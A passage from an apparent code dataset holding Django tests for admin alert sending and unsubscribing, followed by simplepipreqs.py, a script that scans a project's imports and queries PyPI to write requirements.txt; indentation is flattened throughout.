AlertPreference.objects.create(preference=True, **details)
self.assertEqual(AlertPreference.objects.get(**details).preference, True)
unsubscribe_user(self.user, alerts=WelcomeAlert, backends=EpicFailBackend)
self.assertEqual(AlertPreference.objects.get(**details).preference, False)
class AdminAlertTests(TestCase):
def setUp(self):
group = Group.objects.create(name='test_group')
self.admin_alert = AdminAlert(
title="Hello users!",
body="woooord!",
recipients=group
)
def send_it(self):
AdminAlertAdmin.save_model(AdminAlertAdmin(AdminAlert, None), None, self.admin_alert, None, None)
def testDraftMode(self):
self.admin_alert.draft = True
self.send_it()
self.assertEqual(Alert.objects.count(), 0)
self.send_it()
self.assertEqual(Alert.objects.count(), User.objects.count())
def testScheduling(self):
send_at = datetime.now() + timedelta(days=1)
self.admin_alert.send_at = send_at
self.send_it()
for alert in Alert.objects.all():
self.assertEqual(alert.when, send_at)
def testOnlySendOnce(self):
self.assertFalse(self.admin_alert.sent)
self.send_it()
self.assertTrue(self.admin_alert.sent)
alert_count = Alert.objects.count()
self.send_it()
self.assertEqual(alert_count, Alert.objects.count())
|
simplepipreqs.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-import os
from pathlib import Path
import subprocess
from yarg import json2package
from yarg.exceptions import HTTPError
import requests
import argparse
import os
import sys
import json
import threading
import itertools
import time
try:
from pip._internal.operations import freeze
except ImportError: # pip < 10.0
from pip.operations import freeze
def get_installed_packages(pip_version: str = "pip"):
installed_with_versions = []
installed = []
stdout, stderr = subprocess.Popen(
[pip_version, "freeze"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate()
for i in stdout.splitlines():
installed_with_versions.append(i.decode("utf-8"))
installed.append(i.decode("utf-8").split('==')[0])
return installed_with_versions, installed
def get_version_info(module: str, pypi_server: str = "https://pypi.python.org/pypi/", proxy=None):
try:
response = requests.get(
"{0}{1}/json".format(pypi_server, module), proxies=proxy)
if response.status_code == 200:
if hasattr(response.content, 'decode'):
data = json2package(response.content.decode())
else:
data = json2package(response.content)
elif response.status_code >= 300:
raise HTTPError(status_code=response.status_code,
reason=response.reason)
except HTTPError:
return None
return str(module) + '==' + str(data.latest_release_id)
def get_project_imports(directory: str = os.curdir):
modules = []
for path, subdirs, files in os.walk(directory):
for name in files:
if name.endswith('.py'):
# print(path)
with open(os.path.join(path, name)) as f:
contents = f.readlines()
for lines in contents:
words = lines.split(' ')
if 'import' == words[0] or 'from' == words[0]:
line_module = words[1].split('.')[0].split(',')
for module in line_module:
module = module.split('\n')[0]
if module and module not in modules:
modules.append(module)
# print('found {} in {}'.format(module,name))
elif name.endswith('.ipynb'):
with open(str(Path(os.path.join(path, name)).absolute())) as f:
contents = f.readlines()
listToStr = ' '.join([str(elem) for elem in contents])
contents = json.loads(listToStr)
# contents = json.loads(Path(os.path.join(path, name)).absolute().read_text())
for cell in contents["cells"]:
for line in cell["source"]:
words = line.split(' ')
if 'import' == words[0] or 'from' == words[0]:
line_module = words[1].split('.')[0].split(',')
for module in line_module:
module = module.split('\n')[0]
if module and module not in modules:
modules.append(module)
# print('found {} in {}'.format(module, name))
return modules
def init(args):
done_imports = False
def animate_imports():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done_imports:
break
print('Getting imports ' + c, end="\r")
sys.stdout.flush()
time.sleep(0.1)
t_imports = threading.Thread(target=animate_imports)
print()
t_imports.start()
output_text = []
modules = get_project_imports(
) if args['path'] is None else get_project_imports(args['path'])
installed_with_versions, installed = get_installed_packages(
"pip3") if args['version'] is None else get_installed_packages(args['version'])
done_imports = True
time.sleep(0.2)
done_versions = False
def animate_versions():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done_versions:
print("\033[A \033[A")
break
print('Getting versions ' + c, end="\r")
sys.stdout.flush()
time.sleep(0.1)
t_versions = threading.Thread(target=animate_versions)
t_versions.start()
for mod in modules:
if mod in installed:
mod_info = get_version_info(mod)
if mod_info:
output_text.append(mod_info)
done_versions = True
time.sleep(0.2)
print('\nGenrating requirements.txt ... ')
if args['path']:
with open(args['path'] + "/requirements.txt", 'w') as f:
f.write("\n".join(map(str, list(set(output_text)))))
print("Successfuly created/updated requirements.txt")
else:
with open("requirements.txt", 'w') as f:
f.write("\n".join(map(str, list(set(output_text)))))
print("Successfuly created/updated requirements.txt")
print()
def main():
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--version", type=str, help="Pip version")
ap.add_argument("-p", "--path", type=str, help="Path to target directory")
args = vars(ap.parse_args())
try:
init(args)
except KeyboardInterrupt:
sys.exit(0)
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.